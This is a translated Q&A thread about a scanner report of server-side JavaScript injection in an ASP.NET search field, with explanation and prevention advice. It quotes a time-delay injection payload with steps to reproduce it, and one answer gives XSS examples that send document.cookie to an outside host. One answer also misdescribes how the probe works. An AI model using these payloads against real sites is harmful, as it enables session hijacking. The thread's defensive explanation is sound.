Server side JavaScript server side attack
A security check on an ASP.NET website that we are developing reported the following in the input field used for search:
"The ctl00% 24txtTopQckSearch parameter is vulnerable to a server-side JavaScript attack. The provided value appears to be wrapped in dynamically evaluated JavaScript in a single quoted context.
Payload '+ (function () {if (typeof cb715 === "undefined") {var a = new Date (); do {var b = new Date ();} while (ba <20000); cb715 = 1 ;}} ()) + 'presented in parameter ctl00% 24txtTopQckSearch. The application took 7641 milliseconds to respond to the request, compared to 5625 milliseconds for the original request, indicating that the JavaScript injected was causing a delay.
Note that in order to manually reproduce this behavior using report it, you will need to change the name of the canary variable, which is currently cb715. "
My questions:
What is Server Side JavaScript Injection (as opposed to client-side -XSS injection)?
How can I manually recreate the server side attack described above?
How can this be prevented?
Thank!
source to share
What is Server Side JavaScript Injection (as opposed to client-side -XSS injection)?
This is a vulnerability that could allow an attacker to execute their JavaScript code on your server (as opposed to a browser).
How can I manually recreate the server side attack described above?
The report refers to a control txtTopQckSearch
and says that it passed a value +(function(){if(typeof cb715==="undefined"){var a=new Date();do{var b=new Date();}while(b-a<20000);cb715=1;}}())+
for that control.
So you can try to recreate it
- Determining which page is using a control with that name
- Putting this JavaScript into this control (but changing the two occurrences
cb715
to a different name) - Submitting a page
If the scan results are correct, this query should take slightly longer than a query that does not use this value.
How can this be prevented?
Monitor the control txtTopQckSearch
and make sure that the values ββretrieved from that control are never merged into any code that runs on your server.
I think it is quite possible that it is a red herring and that the request was just a little stretched due to some hesitation on your server (the fact that a "safe" request to this page took> 5 seconds indicates that the page may have some performance issues).
One good reason to suspect it is a red herring is that if this code were to run before your server sent a response, the response time difference would be 20 seconds, not 2 seconds, scan.
So, investigate if there are any possible security holes with this control, and if not, write it now as bogus.
source to share
They can inject JavaScript code. This is an XSS vulnerability.
If you have this code (don't know ASP sorry):
<div><?php echo $_GET["foo"];?></div>
It will print whatever you pass like foo
. So if you get someone to download:
http://yoursite.com/index.php?foo=<script>document.location.href="http://mywebsite.com/?cookie=" + document.cookie</script>
I just stole their session. It injects a JavaScript snippet that reads cookies and sends it to my site.
A similar approach exists in JavaScript:
<script>var data = <?php echo $_GET["foo"];?>;</script>
Now if the value is foo
like
"";document.location.href="http://mywebsite.com/?cookie=" + document.cookie`
I stole cookies again.
How to avoid XSS always always always avoid untrustworthy content. In PHP, functions htmlspecialchars
(for HTML) and json_encode
(for JavaScript).
They discover the XSS vulnerability by injecting code that takes a long time (creating 20,000 Date objects) and comparing the time it takes to load the page.
source to share